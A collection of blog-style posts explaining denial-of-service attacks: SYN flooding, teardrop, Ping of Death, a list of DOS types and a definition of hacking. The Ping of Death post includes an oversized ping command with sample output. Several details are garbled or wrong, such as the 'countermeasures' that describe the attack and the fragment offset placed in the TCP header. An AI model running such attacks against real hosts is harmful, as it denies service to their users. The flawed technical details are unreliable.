In a SYN-flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with SYN/ACK packet, but because the source IP address in the original SYN packet is invalid, these SYN/ACK packets are simply sent into the void. Even so, the target host waits in vain for an ACK message from the source system, and as it does, additional requests with invalid IP addresses queue up behind the original once, and the whole cycle starts again. Eventually, due to the large number of connection requests, the target system's memory is consumed, and that system is therefore unable to cater to requests for information made by legitimate users.

In accordance with the rules of TCP/IP, the system will time out after a certain period of time has passed. when this happens, the connections requests queued up on the target system are discarded, thereby freeing a large part of the hogged-up memory. In a typical SYN-flood attack, however, the attacker sends connection requests from spoofed addresses more quickly than the earlier connection requests can be timed out. Because the attacker continuously sends more and more connection requests, the target system's memory is continuously consumed.

Countermeasure  1 :- In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

Countermeasure  2 :- SYN flooding is commonly used in the process of IP spoofing. IP spoofing is discussed later in this chapter in the section titled  "IP spoofing Attacks"

-------------------------------------------------------------------------------------------------------

-------->>      Detecting a SYN-Flood Attack

-------------------------------------------------------------------------------------------------------

Read More

Teardrop Attacks

Whenever data is sent over the Internet, it is broken into fragments at the source system and reassembled at the destination system. For example, suppose you need to send 4,000 bytes of data from one system to another. Rather than sending the entire chunk in a single packet, the data is broken down into smaller packets, each packet carrying a specified range of data like so:

• Packet 1 will carry bytes       1-1500.
• Packet 2 will carry bytes 1501-3000.
• Packet 3 will carry bytes 3001-4000.

Each packet has an Offiset field in its TCP header part that specifies the range of data (that is, the specific bytes of data) being carried by that particular data packet. This along with the value in the Sequence Number field, helps the desination system reassemble the data packets in the correct order.

In a teardrop attack a series of data packets is sent to the target system with overlapping Offer field values. As a result, the target system cannot reassemble the packets and is forced to crash, hang, or reboot.

Still not quite clear on how this works? Let's examine how a system receives data packets under normal circumstances. (Note that the underscore character ( _ ) equals one data packet.) As you can see here, no bytes overlap between packets:

- - - - - - - - - - - -
(Bytes 1-1500) (Bytes 1501-3000) (Bytes 3001-4500)

In a teardrop attack, however, the data packets sent to the target computer contain bytes that overlap with each other:

- - - - - - - - - - - - -
(Bytes 1-1500) (Bytes 1501-3000) (Bytes 1001-3600)

When the target system receives a series of packets like the one shown here, it cannot reassemble the data and, therefore, will crash, hang or reboot.

Countermeasure :-  To protect your system from teardrop attacks, make sure you have the latest patches from your vendor, For more information about these types of attacks and the countermeasures you can take.

-------------------------------------------------------------------------------------------------------
Next Post   ---------->>>   SYN-Flood Attacks
-------------------------------------------------------------------------------------------------------

Read More

Ping of Death

The ping command makes use of the ICMP echo request and echo reply messages and is commonly used to determine whether the remote host is alive. In a Ping of Death attack, however, ping causes the remote system to hang, reboot, or crash. To do so, the attacker uses the ping command in conjunction with the -l argument (used to specify the size of the packet sent) to ping the target system with a data packet that exceeds the maximum bytes allowed by TCP/IP (65,536). For example, the following ping command creates a giant datagram  that is 65,540 bytes in size (the output follows):

C:\windows>ping -l 65540 hostname
Pinging hostname [xx.yy.tt.pp] with 65,540 bytes of data:

Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61
Reply from 203.94.243.71: bytes = 65540 time = 134ms TTL = 61

Countermeasure :- Fortunately, nearly all systems these days are not vulnerable to the Ping of Death. Unless you are running an ancient system with an equally ancient operating system, you are almost sure to be protected from this type of DOS attack. To make sure that your software is patched, however, visit your vendor's Web site and check.

-------------------------------------------------------------------------------------------------------
Next Post   ------>>>   Teardrop Attacks
-------------------------------------------------------------------------------------------------------

Read More

DOS attacks

A denial of service (DOS) attack is an attack that clogs up so much memory on the target system that it cannot serve its users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users. These days, DOS attacks are very common; indeed, just about every server is bound to experience such an attack at some time or another.
There are several different kinds of DOS attacks, the most popular of which are follows:

• Ping of Death
• Teardrop attacks
• SYN-flood attacks 
• Land attacks
• Smurf  attacks
• UPD-flood attacks
• Distributed DOS attacks
• Modem-disconnect attacks

Read More

What is hacking?

A hacker is often someone who creates and modifies computer software and computer hardware, including computer programming, administration, and security-related items. In computer security, a hacker is usually someone who works with the security mechanisms for computer and network systems to strengthen them, it more often in used incorrectly, especially in the mass media, to refer to those who seek access despite them.

 

Read More